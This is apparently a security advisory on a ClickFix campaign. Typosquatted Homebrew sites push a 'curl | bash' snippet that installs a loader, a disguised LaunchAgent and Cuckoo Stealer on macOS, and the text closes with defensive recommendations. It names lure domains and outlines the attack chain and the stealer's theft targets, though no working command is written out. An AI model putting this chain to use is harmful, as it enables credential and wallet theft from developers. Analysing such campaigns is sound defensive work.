ClickFix Exploits Homebrew Workflow to Deploy Cuckoo Stealer for macOS Credential Theft

Homebrew is the de‑facto package manager for macOS developers, making its installation script a trusted entry point. Attackers have exploited this trust by registering look‑alike domains—homabrews.org, raw.brewsh.cx, and others—that replicate the official brew.sh UI. By placing a malicious "curl | bash" snippet on the clipboard, they coerce users into executing code that appears legitimate, effectively turning a simple copy‑paste action into a delivery mechanism for sophisticated malware.

The malicious loader first harvests the user’s macOS password through repeated sudo‑style prompts, then uses the credential to fetch a secondary binary (brew_agent) that strips quarantine attributes and registers a LaunchAgent masquerading as a Homebrew updater. This persistence technique blends seamlessly with normal developer workflows. The second‑stage payload, Cuckoo Stealer, establishes an encrypted HTTPS C2 channel and exfiltrates a broad set of high‑value assets: browser credentials, Keychain entries, Apple Notes, messaging tokens, VPN configs, and cryptocurrency wallet files. Its modular design also captures screenshots and silences audio to avoid detection.

For security teams, the campaign underscores the growing relevance of terminal‑phishing and script‑based attacks in the macOS ecosystem. Defenders should augment web filtering to block known typosquatted domains, enforce strict allow‑lists for raw‑content URLs in curl commands, and monitor for anomalous LaunchAgent entries that imitate popular developer tools. Endpoint detection should flag repeated password prompts from unknown scripts, and user education must emphasize verifying source URLs before pasting commands. Addressing these gaps will reduce the attack surface that ClickFix leverages to deliver Cuckoo Stealer and similar macOS threats.